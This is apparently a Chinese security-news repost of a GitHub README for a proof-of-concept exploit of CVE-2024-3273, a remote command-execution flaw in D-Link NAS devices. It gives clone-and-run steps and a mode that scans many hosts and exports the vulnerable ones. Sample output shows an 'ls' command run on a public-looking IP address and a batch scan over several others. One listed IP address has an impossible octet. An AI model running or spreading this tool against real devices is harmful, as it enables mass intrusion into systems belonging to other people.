最新漏洞情报
独/角/鲸/安/全
此存储库包含CVE-2024-3273的概念验证(PoC),这是在D-Link NAS设备中发现的安全漏洞。该漏洞允许攻击者在易受攻击的设备上执行任意命令。
一、描述及用法
要求
-
Python 3.x
-
requests
library
用法
-
克隆此存储库:
git clone https://github.com/adhikara13/CVE-2024-3273.git
-
导航到存储库目录:
cd CVE-2024-3273
-
运行PoC:
python main.py
5.按照屏幕上的说明选择目标设备:
-
选项1:单个主机(1):输入单个目标设备的详细信息,包括主机IP地址和要运行的命令。
-
选项2:多个主机(2):以
host:port
格式提供包含多个目标设备的文件,并选择是否将易受攻击的主机导出到vulnerables.txt
。
二、示例
Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi
Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.
原文始发于微信公众号(独角鲸安全):「紧急漏洞」CVE-2024-3273 Proof of Concept (PoC)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论